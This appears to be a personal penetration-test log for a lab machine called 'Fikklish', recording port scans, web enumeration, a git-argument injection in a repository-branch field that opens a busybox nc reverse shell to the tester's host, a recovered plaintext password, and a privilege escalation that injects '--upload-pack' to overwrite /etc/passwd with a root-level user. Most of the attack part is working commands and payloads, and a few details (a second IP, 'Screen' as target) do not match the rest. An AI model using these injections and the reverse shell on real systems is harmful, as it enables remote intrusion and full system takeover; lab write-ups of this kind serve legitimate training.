Fikklish
๐งช Pentest Log: {{date:2025-07-02}}
๐ Target Information
- Machine Name: Fikklish
- IP Address: 192.168.155.19
- Operating System: Linux
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 192.168.155.19 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 192.168.155.19 -oN tcp_scan_result.txt
nmap -sU --top-ports 100 192.168.155.13 -oN udp_scan_result.txt
Port 22
ssh tom@192.168.155.19
Port 80
Web Content Enumeration
gobuster dir -u http://192.168.155.19 -w /usr/share/seclists/Discovery/Web-Content/common.txt
feroxbuster --url http://192.168.155.19
wpscan -url http://192.168.155.19
dirsearch -u http://192.168.155.19 -r -o dirsearch.txt
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 8000
- Vulnerability Type: (e.g., RCE, LFI, SQLi, etc.) RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://security.snyk.io/vuln/SNYK-PYTHON-WEBLATE-2414088
Repository branch: --config=alias.pull=!busybox nc 192.168.45.163 8000 -e /bin/bash>/tmp/test.txt
nc -lvnp 8000
found tom's password under .psql_history
tom:RollingShockingLifter231
๐งฌ Privilege Escalation
๐ค Current Access
- User: tom
- Groups: tom
- Shell Type: (reverse shell / web shell / meterpreter / etc.) ssh
- TTY: โ / โ
๐ Enumeration
sudo -l
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: (e.g., Sudo Misconfig, SUID Abuse, Kernel Exploit) Sudo Misconfig
- Target Binary/Service: Screen
- Reference / Source: (GTFOBins, ExploitDB, CVE, etc.): N/A
๐งช Vulnerability Details
https://security.snyk.io/vuln/SNYK-RUBY-GIT-2421270
๐ง Exploit Steps
- Setup
sudo /home/tom/checkout.rb
hack
- Add Privileged User Tony
sudo /home/tom/fetch.rb
hack
--upload-pack=echo 'tony:$1$test$28Tmd0tsvqI1Eq.TDxcaq/:0:0:tony,,,:/root:/bin/bash' > /etc/passwd;
- Smash to root
su tony